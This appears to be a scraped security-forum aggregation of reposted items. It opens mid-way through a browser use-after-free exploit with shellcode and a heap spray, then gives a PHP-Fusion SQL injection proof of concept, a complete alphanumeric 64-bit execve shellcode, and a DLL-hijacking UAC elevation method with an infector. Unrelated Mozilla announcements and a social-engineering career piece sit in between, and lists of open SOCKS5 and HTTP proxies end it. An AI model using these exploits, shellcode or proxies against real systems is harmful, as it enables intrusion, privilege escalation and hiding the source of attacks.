unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); /* _______0x1cc_____ | | \|/ | Junk ROP Shellcode Pivot Junk 2 3 1 */ while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34"); buffer += rop; buffer += shellcode; while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34"); while (buffer.length < 0x1000) buffer += buffer; data = buffer.substring(0,offset) + pivot + rop + shellcode data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); //obj.style.fontFamily = data.substring(0,0x40000-0x58); sprayelement.appendChild(obj); } block = unescape( // Literal string to avoid heap allocation "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"); blocks = new Array(); for (i = 0; i < spraysize; i++) { // spray 1 blocks.push(document.createElement("button")); blocks[i].setAttribute("title",block.substring(0, block.length)); sprayelement.appendChild(blocks[i]); } for (i = spraysize/2; i < spraysize; i++) { // free some blocks blocks[i].setAttribute("title",""); } var newdiv = document.createElement('div'); newdiv.innerHTML = "<textarea id='CTextArea'></textarea>"; document.getElementById("frm").appendChild(newdiv); var newdiv2 = document.createElement('div'); newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>"; document.getElementById("frm").appendChild(newdiv2); document.getElementById("CInput").checked = true; trigger = true; document.getElementById("frm").reset(); function crash() { if (trigger) { document.getElementById("frm").innerHTML = ""; // Free object, trigger bug CollectGarbage(); for (i = spraysize/2; i < spraysize; i++) { // spray 2 blocks[i].setAttribute("title",block.substring(0, block.length)); } } } </script> </body> </html> Sursa: http://www.exploit-db.com/exploits/35213/

[h=1]PHP-Fusion 7.02.07 - SQL Injection[/h] # Exploit Title: PHP-Fusion 7.02.07 SQL Injection # Date: 06/11/2014 # Exploit Author: Mauricio Correa # Vendor Homepage: www.php-fusion.co.uk # Software Link: http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/ PHP-Fusion-7.02.07.zip # Version: 7.02.07 # Tested on: Linux OS (Debian) # CVE : CVE-2014-8596 GET /PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75 cd&submit_id=1[SQL Injection]&t=n HTTP/1.1 Host: 192.168.0.105 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620 b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9; fusion68fF5_visited=yes; has_js=1; Connection: keep-alive and GET /PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[S QL Injection] HTTP/1.1 Host: 192.168.0.105 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620 b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;; fusion68fF5_visited=yes; has_js=1; Connection: keep-alive More informations (in Portuguese Br): https://www.xlabs.com.br/blog/?p=282 Sursa: http://www.exploit-db.com/exploits/35206/

[h=1]Introducing Polaris Privacy Initiative to Accelerate User-focused Privacy Online[/h]Denelle Dixon-Thayer At Mozilla, we believe that an individuals’ privacy on the Internet cannot be treated as optional. Our Privacy Principles guide us with the design of each of our products and services. We’ve introduced features to support our privacy focus across desktop and mobile, including: an add-on platform with Firefox Add-ons like LightBeam, Ghostery and Privacy Badger; the Do Not Track preference; Private and Guest Browsing; high levels of encryption with Firefox Sync; an individual approach to apps permissions; and even a new Forget button. But we recognize we need to do better and do more. We want to give our users the Web experience they want through features that create transparency and control. We want our users to trust us and the Web. In October 2014, Harris Poll conducted a global online survey* on behalf of Mozilla of more than 7,000 online adults ages 18-64. Three quarters (74%) of people feel their personal information on the Web is less private today than it was one year ago. That same figure of adults agree that Internet companies know too much about them. We think we can help with this concern. Today, we are excited to announce a new strategic initiative at Mozilla called Polaris. Polaris is a privacy initiative built to pull together our own privacy efforts along with other privacy leaders in the industry. Polaris is designed to allow us to collaborate more effectively, more explicitly and more directly to bring more privacy features into our products. We want to accelerate pragmatic and user-focused advances in privacy technology for the Web, giving users more control, awareness and protection in their Web experiences. We want to advance the state of the art in privacy features, with a specific focus on bringing them to more mainstream audiences. We’re joined at launch by the Center for Democracy & Technology (CDT), and the Tor Project both non-profits, who will support and advise Polaris projects and help us align them with policy goals. We believe that the support and assistance from each of these groups is crucial. “CDT looks forward to working with Mozilla on the Polaris program and advising on issues like combating Internet censorship and protecting online anonymity, which are vital to promoting free expression online.” said Justin Brookman of CDT. Not only will these collaborations hold us accountable to staying true to our goal of getting new and innovative privacy features into our general release products, the diversity of understanding, focus and opinion will improve what we bring to the mainstream. Today we’re announcing two experiments under the Polaris banner, focused on anti-censorship technology, anonymity, and cross-site tracking protection. First, Mozilla engineers are evaluating the Tor Project’s changes to Firefox, to determine if changes to our own platform codebase can enable Tor to work more quickly and easily. Mozilla will also soon begin hosting our own high-capacity Tor middle relays to make Tor’s network more responsive and allow Tor to serve more users. “The Tor Project is excited to join Mozilla as a launch partner in the Polaris program. We look forward to working together on privacy technology, open standards, and future product collaborations,” said Andrew Lewman of the Tor Project. The second experiment (which is our first in-product Polaris experiment) seeks to understand how we can offer a feature that protects those users that want to be free from invasive tracking without penalizing advertisers and content sites that respect a user’s preferences. We’re currently testing this privacy tool in our “Nightly” channel. The experiment is promising, but it’s not a full-fledged feature yet. We’ll test and refine the user experience and platform behavior over the coming months and collect feedback from all sides before this is added to our general release versions. We recognize that privacy is not just a functionality on your computer or a setting you can turn on or off, and we’re excited to see what we can do to advance privacy online with Polaris. To learn more or to join us, visit the wiki. *Survey Methodology This survey was conducted online within Great Britain, France, Spain, German, Brazil, and India between October 22nd and 29th, 2014 among 7,077 adults (aged 18-64) by Harris Poll on behalf of Mozilla via its Global Omnibus product. Figures for age, sex, race/ethnicity, education, region and household income were weighted where necessary to bring them into line with their actual proportions in the population. Where appropriate, this data were also weighted to reflect the composition of the adult online population. For complete survey methodology, including weighting variables, please contact press@mozilla.com Sursa: https://blog.mozilla.org/privacy/2014/11/10/introducing-polaris-privacy-initiative-to-accelerate-user-focused-privacy-online/

How To Become a Social Engineer November 10, 2014 I really must admit that one of the most asked questions we get through the website is something like, “I really want to get into social engineering as a career, what should I read/take in college to give me the best chance?” then followed up by “How do I get into this as a job/career?” It is a serious question that we have spent considerable time trying to come with an appropriate answer for. This month I will answer the education piece, by telling you my own thoughts, what I look for when I hire and also what some of my most trusted friends from large companies look for when hiring. Then next month, I will go into how to make this your career. So you wanna be a social engineer? I understand why the question comes in so often. This job is pretty cool sounding. We get paid to phish, vish and break into companies every day. That certainly sounds like the dream job – well at least for a lot of us. Like most careers, it is logical to think that there may be a clear path to education to help you with a leg up in this field. Some people ask me, if they should study psychology, if they should get sales experience, others wonder if they should skip school all together. What’s the answer? Let’s first ask my good friend Jim. He manages a large team of pentesters that includes red teams, social engineers and some excellent hackers at one of the world’s largest financial institutions. I asked him this question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Jim says, “First of all I look for experience. But there are certifications that mean something to me like Offensive Security’s certifications (OSCP / OSCE) and the CISSP. In addition, my mantra is generally: Jack-of-all-trades, master of a couple. I look for folks who have a fairly broad generalist experience, but have taken an interest in deeply diving into one or two. I also look for mentality; can the candidate think like a bad guy? Is security your job, or a passion? What does your home network look like? And very importantly, does the candidate have the ability to communicate clearly, concisely, and professionally. Finally, personal references are good, especially when it comes to character, since if you join my team you’re going to have to be a highly trusted individual.” Thanks Jim, that was very helpful. I went another very close friend who has been in the industry for a very long time helping run Black Hat and now running the Global Education and Training practice at Accuvant, Ping Look. Jim, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Ping said, “Accuvant does not look for degrees – experience and ability to pass the practical exams that we administer and references, especially industry ones, are more important. I know that most hacker’s goals aren’t to be promoted to management but the reality is that everyone has to make a living and having more responsibility within a company usually means a promotion whether it be to management or not. I do know from anecdotal experience of others that at a lot of larger firms, not having a college degree will make it more difficult to be promoted (initially) to management positions. HOWEVER in a technical field, smart companies know that InfoSec is still an emerging marketplace and that finding a candidate with a college degree, especially in computer science who is also a good infosec practitioner with the necessary experience will be very difficult. Over time, those who prove themselves technically adept and have good management chops end up having the same chance in getting promotions or running teams or being lead technologist or chief research scientist as the guy with a degree.” Another excellent answer, that really helps us to get a clear picture. Finally, I went to my good friend, Dave Kennedy. Dave started his own company just a few years ago, Trusted Sec, and went from just a couple people to over 20 people. He obviously knows a thing or two about hiring pentesters. So I presented him with the same question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Dave said, “I favor experience over education any day. Although a college degree is important, I am looking for someone who has the experience to handle the type of work that we get. References are important, but I tend to hire people I’ve known and trust in the industry so I always get individuals I know and trust to do the work.” All three answers really paint a great picture for anyone thinking and asking. What about Social-Engineer, Inc? My company has personally grown over the last couple years so I have had to spend considerable time thinking about what it is that I need in employees. Unlike some of the great minds I asked above, my needs are a tad bit different. But let me pick out the similarities from what we saw above: Experience always wins. Many of my team have degrees, and some, like Michele are not only highly educated but trained educators. Even with that, experience is king. Now with that said there aren’t just slews of people that have tons of experience in phishing, vishing and breaking into buildings without having a criminal record. I will discuss later how we get around this particular hurdle in a bit. Mentality: This is a big one because there are many components to this particular topic. Can the person think like a bad guy? We have a motto in my company, “Always leave them feeling better for having met you.” We apply that to how we want our customers to feel about our services. So although I need my people to be able to THINK like a bad guy, I need them to care enough about the customer that they don’t revel in the bad side too long. Desire to learn. We are in a constant state of growth, and part of that is learning how to adapt when the times, attack vectors and methods of the bad guys change. My team has to be willing to do that. Learn from failure. I have failed so many times I can’t count them, but the important part is learning from each failure. My team has to be willing to have the same attitude. Is this a hobby or a passion? It is important to me to find people who enjoy the work and don’t just look at it as a “job”. [*]Performance based education. Right now from what I found, Social-Engineer has the only performance based SE Certification around. I also favor the Offensive Security Certifications as they prove fortitude, persistence and critical thinking skills. [*]Critical thinkers. Probably one of the most important aspects of being a social engineer is being able to critically think. To adapt, flex and change your methods on the fly. To be able to think outside the box, as if there is no box. [*]Willingness to try new things. Many times my team will be required to try completely new things, new pretexts, new methodologies and new processes. Does this mean that education is completely useless? No, not at all. Depending on the role we are looking for a degree can definitely add to usefulness and the position we use the person for. If you are going to college already and you are thinking of a career in pentesting and maybe even social engineering, then there are some areas of study that can help. Things like computer sciences, psychology and social psychology can all help. Of course, we think everyone who wants to be a social engineer should take our 5-day “Advanced Practical Social Engineering” course too. In the end, the fortitude to stick through college, study hard and graduate with good grades can tell a potential employer that you have some great qualities to make a good employee. In the end of the day, social engineering is an exciting and very rewarding career path. Study hard, stay out of trouble and get practical experience where you can and it may just be your career someday too. Next month we will discuss the HOW… till then, stay safe. - See more at: http://www.social-engineer.org/newsletter/social-engineer-newsletter-vol-05-issue-61 Sursa: How To Become a Social Engineer | Christopher Hadnagy | LinkedIn

Mozilla Introduces the First Browser Built For Developers: Firefox Developer Edition on November 10, 2014 by Dave Camp Developers are critical to the continued success of the Web. The content and apps they create compel us to come back to the Web every day, whether on a computer or mobile phone. In celebration of the 10th anniversary of Firefox, we’re excited to unveil Firefox Developer Edition, the first browser created specifically for developers. Ten years ago, we built Firefox for early adopters and developers to give them more choice and control. Firefox integrated WebAPIs and Add-ons to enable people to get the most out of the Web. Now we’re giving developers the whole browser as a hard-hat area, allowing us to bring front and center the features most relevant to them. Having a dedicated developer browser means we can tailor the browsing experience to what developers do every day. Because Firefox is part of an open-source, independent community and not part of a proprietary ecosystem, we’re able to offer features other browsers can’t by applying our tools everywhere the Web goes, regardless of platform or device. One of the biggest pain points for developers is having to use numerous siloed development environments in order to create engaging content or for targeting different app stores. For these reasons, developers often end up having to bounce between different platforms and browsers, which decreases productivity and causes frustration. Firefox Developer Edition solves this problem by creating a focal point to streamline your development workflow. It’s a stable developer browser which is not only a powerful authoring tool but also robust enough for everyday browsing. It also adds new features that simplify the process of building for the entire Web, whether targeting mobile or desktop across many different platforms. If you’re an experienced developer, you’ll already be familiar with the installed tools so you can focus on developing your content or app as soon as you open the browser. There’s no need to download additional plugins or applications to debug mobile devices. If you’re a new Web developer, the streamlined workflow and the fact that everything is already set up and ready to go makes it easier to get started building sophisticated applications. So what’s under the hood? The first thing you’ll notice is the distinctive dark design running through the browser. We applied the developer tools theme to the entire browser. It’s trim and sharp and focused on saving space for the content on your screen. It also fits in with the darker look common among creative app development tools. We’ve also integrated two powerful new features, Valence and WebIDE that improve workflow and help you debug other browsers and apps directly from within Firefox Developer Edition. Valence (previously called Firefox Tools Adapter) lets you develop and debug your app across multiple browsers and devices by connecting the Firefox dev tools to other major browser engines. Valence also extends the awesome tools we’ve built to debug Firefox OS and Firefox for Android to the other major mobile browsers including Chrome on Android and Safari on iOS. So far these tools include our Inspector, Debugger and Console and Style Editor. WebIDE allows you to develop, deploy and debug Web apps directly in your browser, or on a Firefox OS device. It lets you create a new Firefox OS app (which is just a web app) from a template, or open up the code of an existing app. From there you can edit the app’s files. It’s one click to run the app in a simulator and one more to debug it with the developer tools. Firefox Developer Edition also includes all the tools experienced Web developers are familiar with, including: Responsive Design Mode – see how your website or Web app will look on different screen sizes without changing the size of your browser window. Page Inspector- examine the HTML and CSS of any Web page and easily modify the structure and layout of a page. Web Console – see logged information associated with a Web page and use Web Console and interact with a Web page using JavaScript. JavaScript Debugger – step through JavaScript code and examine or modify its state to help track down bugs. Network Monitor – see all the network requests your browser makes, how long each request takes and details of each request. Style Editor – view and edit CSS styles associated with a Web page, create new ones and apply existing CSS stylesheets to any page. Web Audio Editor – inspect and interact with Web Audio API in real time to ensure that all audio nodes are connected in the way you expect. Give it a try and let us know what you think. We’re keen to hear your feedback. More Information: Download Firefox Developer Edition Release Notes Sursa: https://hacks.mozilla.org/2014/11/mozilla-introduces-the-first-browser-built-for-developers-firefox-developer-edition/

[h=1]Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)[/h] #Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) #Author: Breaking.Technology #Date: 06 November 2014 #Vendor Homepage: http://breaking.technology #Version: x86-64 platforms #Classification: 64 bit shellcode #Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt # Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) # This shellcode will successfully execute every time as long as it is returned to. # (c) 2014 Breaking Technology, Inc. # http://breaking.technology/ # # Assembled (87 bytes): # XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V # # Assembly: # user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o .section .data .section .text .globl _start _start: # "XX" pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer prepare_ff: # "j0TYX45Pk13" push $0x30 # 'j0' push %rsp # 'T' pop %rcx # 'Y' %rcx points to $0x30 pop %rax # 'X' %rax = 0x30 xor $0x35, %al # '45' %rax = 0x05 push %rax # 'P' (%rcx) = 0x05 imul $0x33, (%rcx), %esi # 'k13' %esi = 0x000000ff prepare_f8: # "VX4047" # mov %rsi, %rax push %rsi # 'V' pop %rax # 'X' %rax = %rsi = 0x000000ff # mov $0xf8, %al xor $0x30, %al # '40' xor $0x37, %al # '47' %rax = 0x000000f8 write_negative_8: # "3At1At1qu1qv1qw" # mov %eax, 0x74(%rcx) xor 0x74(%rcx), %eax # '3At' xor %eax, 0x74(%rcx) # '1At' 0xf8 # mov %sil, 0x75 - 0x77 + rcx xor %esi, 0x75(%rcx) # '1qu' 0xff xor %esi, 0x76(%rcx) # '1qv' 0xff xor %esi, 0x77(%rcx) # '1qw' 0xff # -8 is now on the stack as a 32-bit dword # at 0x74(%rcx) read_negative_8: # "Hcyt" # move long (dword) to signed quadword # mov -8, %rdi movslq 0x74(%rcx), %rdi # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 ) get_return_pointer: # "14yH34y" # mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi # OR IN DECIMAL: # mov -16(%rcx), %rsi xor %esi, (%rcx, %rdi, 2) # '14y' xor (%rcx, %rdi, 2), %rsi # 'H34y' prepare_key: # "hj5XVX" # put the xor key into %eax push $0x5658356a # 'hj5XV' pushed backwards because x86 stack. pop %rax # 'X' decode_encoded_code: # "1FK" xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded decode_encoded_data: # "1FSH3FO" xor %eax, 0x53(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded xor 0x4f(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax begin_stack_setup: # "PT" push %rax # 'P' push "/bin/sh\0" push %rsp # 'T' push pointer to /bin/sh zero_rax: # "j0X40" # xor %rax, %rax push $0x30 # 'j0' pop %rax # 'X' xor $0x30, %al # '40' %rax is NULL end_stack_setup: # "PP" push %rax # 'P' push NULL push %rax # 'P' push NULL mov_3b_al: # "4u4N" # mov $0x3b, %al xor $0x75, %al # '4u' xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b # this is for syscall ^ begin_stack_run: # "Z" pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL encoded_code: # "4jWS" # 0x34 0x6a 0x57 0x53 # AFTER XOR MAGIC: .byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL .byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" .byte 0x57 # "\x0f" .byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL); # syscall(%rax) = function(%rdi,%rsi,%rdx); # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL); encoded_data: # "EW18EF0V" turns into "/bin/sh\0" # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56 # AFTER XOR MAGIC: .byte 0x45 # / .byte 0x57 # b .byte 0x31 # i .byte 0x38 # n .byte 0x45 # / .byte 0x46 # s .byte 0x30 # h .byte 0x56 # \0 Sursa: http://www.exploit-db.com/exploits/35205/

[h=1]KdExploitMe[/h] A kernel driver to practice writing exploits against, as well as some example exploits using public techniques. Sursa: https://github.com/clymb3r/KdExploitMe

[h=3]Passive UAC Elevation[/h] I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll. [h=2]LoadLibrary[/h] This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file: The system will first check the KnownDlls registry key for the path, if it's not found there, then the system will the look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64. If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; However, the dll must meet the following criteria. The application must load the dll by its name and not the full path (this is common). The dll must not exist in HKLM\SYSTEM\Control\Session Manager\KnownDLLs. The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa). The dll should exist in system32 or syswow64, special paths don't appear to work. ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher "Adobe Systems Incorporated" and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Is it a real flash update? Is it just ZeroAccess? Nobody know.[/TD] [/TR] [/TABLE] [h=2]A Less Invasive Method[/h] What if there was a folder where 90% of the applications that require UAC elevation reside and what if it was writable from a non-elevated process? Well it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherload: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it to the downloads folder, and run a setup file. Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll, however this is a fairly easy fix: dll infection. [h=2]Writing a DLL Infector[/h] My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disable and overwrite the bound imports directory with the new section header, append the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section. All we need now is some code for the section. [h=2]The Shellcode[/h] The obvious choice was the make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros, I'll quickly run over how it works. Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll. Usess a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA. Opens the current process token and queries it to confirm the application we are running from is UAC elevated. Gets the path of cmd.exe then executes it (UAC elevated of course). Passes execution back to the real dwmapi.dll entry point so execution can continue. [h=2]Putting It All Together[/h] The final product infects dwmapi.dll with our shellcode and places it in the download folder, once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned ( Because of Wow64FsRedirect and the fact that most setups run under wow64, we can use the same code on 32-bit and 64-bit windows). I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator Posted by TM at 11:03 AM Sursa: MalwareTech: Passive UAC Elevation

[h=1]08-11-14 | VIP Socks 5 (62)[/h] [LIST=1]08-11-14 | VIP Socks 5 (62) Checked & filtered Socks5: 107.185.202.211:47603 108.162.40.186:52707 109.201.254.216:27976 122.221.158.15:31978 135.19.61.219:19291 142.196.192.133:18215 173.163.56.233:36847 173.217.23.79:41406 174.1.13.143:32726 174.55.203.55:26215 174.60.73.244:37761 180.64.68.40:443 184.166.178.229:30957 184.68.38.126:16444 194.44.175.41:1081 194.44.175.49:1081 198.27.67.24:53193 198.50.206.1:443 199.201.126.163:443 201.211.174.68:17195 202.154.102.12:20669 205.144.214.26:17232 216.171.240.92:1053 216.240.53.99:29059 222.114.148.54:443 23.106.90.230:11973 24.15.203.60:28655 24.192.152.155:15975 24.210.225.114:10557 24.49.210.53:48659 24.51.216.43:51039 24.59.45.242:15310 24.93.123.61:23183 31.129.91.129:33335 47.22.36.178:32754 5.11.76.183:36209 61.147.67.2:9123 66.168.209.178:20700 67.183.10.14:5105 68.225.150.49:7733 69.116.206.228:33198 70.126.76.45:32973 70.33.46.92:52784 70.64.144.216:46069 71.225.92.117:37467 71.9.127.141:36820 72.192.18.107:46478 74.132.8.66:29734 75.71.170.182:33683 75.84.52.36:43440 76.173.39.152:53356 78.237.248.24:17909 78.39.178.2:443 80.46.160.219:25712 80.47.184.124:49168 85.30.233.152:4013 89.44.109.160:13135 92.240.248.75:443 96.29.132.66:18433 96.3.48.98:24257 98.235.80.130:22831 99.229.170.129:41438 [/LIST] Sursa: 08-11-14 | VIP Socks 5 (62) - Pastebin.com

08-11-14 | Fast Proxy Server List (1655) [LIST=1]08-11-14 | Fast Proxy Server List (1655) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.160.80.14:8088 1.161.212.57:80 1.161.212.57:8080 1.164.212.237:8088 1.164.227.161:8088 1.168.89.87:8088 1.171.1.145:9064 1.172.2.142:9064 1.179.147.2:8080 1.192.116.28:8585 101.251.238.123:8080 101.69.168.210:9000 101.69.168.211:9000 101.79.246.16:8080 101.79.246.6:8080 103.16.114.11:3128 103.21.184.209:9064 103.246.244.161:44338 103.249.181.5:3128 103.25.155.51:8080 103.25.203.227:7808 103.25.203.227:8089 103.25.7.51:9064 103.254.126.38:80 103.254.126.38:8080 103.255.121.195:80 103.28.158.41:9064 103.28.255.90:9064 103.31.133.226:3128 103.4.167.186:80 106.3.40.249:8081 106.37.177.251:3128 107.150.224.29:80 107.150.224.29:8080 107.170.206.99:80 108.165.33.11:3128 108.165.33.3:3128 108.165.33.4:3128 108.165.33.7:3128 108.165.33.9:3128 108.47.12.2:8081 109.120.150.87:3128 109.228.25.136:80 109.251.10.3:8080 109.73.170.248:80 110.153.9.250:80 110.252.17.176:8585 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.54.224.226:8080 110.77.197.156:3128 110.77.212.109:8080 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:8085 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8080 111.1.32.24:8088 111.1.32.24:81 111.1.32.24:8123 111.1.32.24:9064 111.1.32.24:9999 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.163:81 111.1.36.164:80 111.1.36.164:83 111.1.36.164:84 111.1.36.164:85 111.1.36.164:86 111.1.36.165:80 111.1.36.165:81 111.1.36.165:83 111.1.36.2:80 111.1.36.21:80 111.1.36.21:81 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.21:86 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:82 111.1.36.23:83 111.1.36.23:85 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 111.1.36.25:82 111.1.36.25:83 111.1.36.25:84 111.1.36.25:85 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:82 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.10.10.25:8123 111.10.100.152:8123 111.10.100.206:8123 111.10.100.229:8123 111.10.103.231:8123 111.10.103.8:8123 111.10.108.200:8123 111.10.108.89:8123 111.10.112.131:8123 111.10.113.41:8123 111.10.113.81:8123 111.10.114.109:8123 111.10.115.68:8123 111.10.116.124:8123 111.10.116.183:8123 111.10.116.254:8123 111.10.117.84:8123 111.10.118.13:8123 111.10.118.159:8123 111.10.118.97:8123 111.10.128.199:8123 111.10.129.83:8123 111.10.130.176:8123 111.10.136.193:8123 111.10.137.169:8123 111.10.138.190:8123 111.10.139.154:8123 111.10.139.3:8123 111.10.14.153:8123 111.10.144.188:8123 111.10.145.59:8123 111.10.147.224:8123 111.10.15.14:8123 111.10.153.171:8123 111.10.155.159:8123 111.10.156.35:8123 111.10.160.198:8123 111.10.160.72:8123 111.10.163.89:8123 111.10.165.125:8123 111.10.165.155:8123 111.10.166.130:8123 111.10.166.209:8123 111.10.167.246:8123 111.10.167.48:8123 111.10.167.90:8123 111.10.177.223:8123 111.10.178.246:8123 111.10.182.230:8123 111.10.189.17:8123 111.10.198.100:8123 111.10.83.93:8123 111.11.184.10:80 